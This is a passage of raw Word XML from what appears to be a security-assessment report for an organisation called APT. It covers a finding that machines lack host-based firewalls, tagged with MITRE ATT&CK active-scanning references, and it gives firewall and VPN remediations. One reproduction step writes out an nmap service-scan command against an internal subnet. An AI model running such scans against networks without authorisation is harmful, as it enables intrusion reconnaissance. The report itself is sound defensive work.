                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>1595</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3476A9A2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7CFC3537">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Active Scanning</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="431210B6">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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6713CC7"/>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65225DD" w:rsidP="0D325B6E" w:rsidRDefault="665225DD" w14:paraId="6C5BDFC7" w14:textId="46B2E566">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efbe412c20ef47bc">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="665225DD">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1037: Filter Network Traffic</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="70ECB33A" w:rsidP="0D325B6E" w:rsidRDefault="70ECB33A" w14:paraId="2693DE83" w14:textId="3D2E2BC8">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R92fed6ca64d643e5">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="70ECB33A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1056</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0CB51999">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="336F784E">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241C39FF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Pre-</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="714BD321">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>c</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="70ECB33A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ompromise</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="599C1F4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A8EFEDA" w14:textId="0775E690">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D3E54FC" w14:textId="6CF0250A">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2B52FF53" w14:textId="7418EF75">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0312474B" w:rsidP="0D325B6E" w:rsidRDefault="0312474B" w14:paraId="51C5EAB6" w14:textId="48553FF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12474B">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E8CB197" w:rsidP="0D325B6E" w:rsidRDefault="5E8CB197" w14:paraId="47DCCF4A" w14:textId="59DD86E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E8CB197">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0D2A80BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ultiple machines within APT’s network </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4C1675A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4C1675A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>operating</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4C1675A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> without any host-based firewalls or access control list (ACL) protections. Th</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="355DFC00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e absence of host-based firewalls increases the attack surface, allowing for</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="615C065F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine enumeration,</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="355DFC00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> unauthorized access, and exploitation of vulnerable services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2B1B54EA" w14:textId="19B72DB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312474B" w:rsidP="0D325B6E" w:rsidRDefault="0312474B" w14:paraId="292DB066" w14:textId="2DE87D1F">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12474B">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ABAEA70" w:rsidP="0D325B6E" w:rsidRDefault="5ABAEA70" w14:paraId="0809B082" w14:textId="24AB4007">
      <w:p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ABAEA70">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The lack of network protection leaves the business open for attackers to exploit any vulnerabilities on the affected machines. If they gain access to the internal network, they will </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="55BF14CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">be able to cause </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="55BF14CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>significant damage</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="55BF14CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to APT’s operational functionality and lead to</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="21F99259">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the loss of sensitive data. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="652D69F8" w14:textId="52B7FC19">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0312474B" w:rsidP="0D325B6E" w:rsidRDefault="0312474B" w14:paraId="01F1E50D" w14:textId="5F9A990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12474B">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8F316BB" w:rsidP="0D325B6E" w:rsidRDefault="68F316BB" w14:paraId="7FCC8551" w14:textId="4B6E441A">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8F316BB">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 xml:space="preserve">Run </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nmap</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 xml:space="preserve"> on the network to </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enumerate</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 xml:space="preserve"> services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0B8FBB53" w:rsidP="0D325B6E" w:rsidRDefault="0B8FBB53" w14:paraId="07424BF3" w14:textId="4171BE31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="144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Nmap –</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sV</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sC</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0B8FBB53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.0.0/24 --min-rate 5000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7E25D092" w14:textId="79BB5AA1">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312474B" w:rsidP="0D325B6E" w:rsidRDefault="0312474B" w14:paraId="4888A2E3" w14:textId="664D7EE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12474B">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9C13F81" w:rsidP="0D325B6E" w:rsidRDefault="39C13F81" w14:paraId="1E2A5060" w14:textId="4870AF08">
      <w:p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C13F8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9C13F81" w:rsidP="0D325B6E" w:rsidRDefault="39C13F81" w14:paraId="48EDCFF8" w14:textId="40C9B4BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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5864A40E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>host-based</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firewalls on </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="178DFB87">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>every</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machine</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="207470A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3F41EB6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to block </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3707C626">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">unauthorized network traffic to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="315612D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and from </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3707C626">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">internal </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3707C626">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3707C626">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3707C626">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chines</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7C652FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="39C13F81" w:rsidP="0D325B6E" w:rsidRDefault="39C13F81" w14:paraId="295B7D39" w14:textId="2E8151FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Use iptables, </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ufw</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or </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firewalld</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for </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65C33588">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Li</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nux</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-based machines</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6C1C3DC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and u</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se the built-in </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6E8DE633">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indows </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5F1AA262">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defender F</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irewall</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 xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="41F8A239">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39C13F81">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>indows-based machines.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0319958E" w:rsidP="0D325B6E" w:rsidRDefault="0319958E" w14:paraId="12CCE16A" w14:textId="1FE18C92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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19958E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Consider implementing a VPN policy to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0319958E">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0319958E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> employees to remotely access internal systems in a secure fashion.</w:t>
      </w:r>
